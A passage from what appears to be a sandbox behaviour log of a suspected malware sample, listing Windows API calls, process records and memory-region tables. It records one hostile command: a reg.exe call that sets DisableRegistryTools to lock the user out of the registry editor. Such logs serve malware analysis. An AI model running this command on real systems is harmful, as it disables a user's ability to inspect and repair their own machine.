lpValue="00000000") returned 1 [0277.596] GetProcessHeap () returned 0x4b0000 [0277.597] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b7e00) returned 1 [0277.597] GetEnvironmentStringsW () returned 0x4bb2a8* [0277.597] GetProcessHeap () returned 0x4b0000 [0277.597] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa9c) returned 0x4b7e00 [0277.597] FreeEnvironmentStringsA (penv="=") returned 1 [0277.597] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0277.597] GetProcessHeap () returned 0x4b0000 [0277.597] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4b7e00) returned 1 [0277.597] GetEnvironmentStringsW () returned 0x4bb2a8* [0277.597] GetProcessHeap () returned 0x4b0000 [0277.597] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xa9c) returned 0x4b7e00 [0277.597] FreeEnvironmentStringsA (penv="=") returned 1 [0277.598] GetProcessHeap () returned 0x4b0000 [0277.598] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x4bb278) returned 1 [0277.598] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0277.598] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.598] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0277.883] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.883] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0278.305] _get_osfhandle (_FileHandle=0) returned 0x38 [0278.305] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0278.320] SetConsoleInputExeNameW () returned 0x1 [0278.320] GetConsoleOutputCP () returned 0x1b5 [0278.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0278.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0278.341] exit (_Code=0) Thread: id = 182 os_tid = 0xd24 Process: id = "28" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3c0f1000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x578" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2510 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2511 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2512 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2513 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2514 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2515 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2516 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2517 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2518 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2519 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2520 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2521 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2522 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2523 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2524 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2525 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2526 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2527 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2528 start_va = 0x190000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2529 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2530 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2531 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2532 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2533 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2534 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2535 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2536 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2537 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2538 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2539 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2540 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2541 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2542 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2543 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2544 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2545 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2546 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2547 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2548 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2549 start_va = 0x1eb0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2550 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2551 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2552 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2553 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2554 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2555 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2556 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2557 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2558 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2559 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2560 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2561 start_va = 0x1eb0000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2562 start_va = 0x2010000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 2563 start_va = 0x2020000 end_va = 0x2356fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2564 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2565 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2566 start_va = 0x640000 end_va = 0x660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2567 start_va = 0x1eb0000 end_va = 0x1f09fff monitored = 1 entry_point = 0x1ec53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2568 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2569 start_va = 0x2360000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2570 start_va = 0x2580000 end_va = 0x279afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2571 start_va = 0x27a0000 end_va = 0x28b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 2572 start_va = 0x28c0000 end_va = 0x2ad4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 2573 start_va = 0x2ae0000 end_va = 0x2beafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 2574 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2575 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2576 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2577 start_va = 0x2bf0000 end_va = 0x2cabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bf0000" filename = "" Region: id = 2578 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2579 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2580 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2581 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2582 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2583 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2584 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2585 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2586 start_va = 0x1eb0000 end_va = 0x1eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2587 start_va = 0x1ec0000 end_va = 0x1ec1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 2588 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2589 start_va = 0x1ed0000 end_va = 0x1ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2590 start_va = 0x1ee0000 end_va = 0x1ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Thread: id = 178 os_tid = 0x108c Thread: id = 179 os_tid = 0x9c0 Thread: id = 180 os_tid = 0x934 Thread: id = 181 os_tid = 0xb7c Process: id = "29" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x6a23a000" os_pid = "0x614" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x578" cmd_line = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2600 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2601 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2602 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2603 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2604 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2605 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2606 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2607 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2608 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2609 start_va = 0xfa0000 end_va = 0xff2fff monitored = 1 entry_point = 0xfac820 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\SysWOW64\\reg.exe" (normalized: "c:\\windows\\syswow64\\reg.exe") Region: id = 2610 start_va = 0x1000000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 2611 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2612 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2613 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2614 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2615 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2616 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2617 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2618 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2619 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2620 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2621 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2622 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2623 start_va = 0x5d0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2624 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2625 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2626 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2627 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2628 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2629 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2630 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2631 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2632 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2633 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2634 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2635 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2636 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2637 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2638 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2639 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2640 start_va = 0x7c0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2641 start_va = 0x9b0000 end_va = 0xce6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = 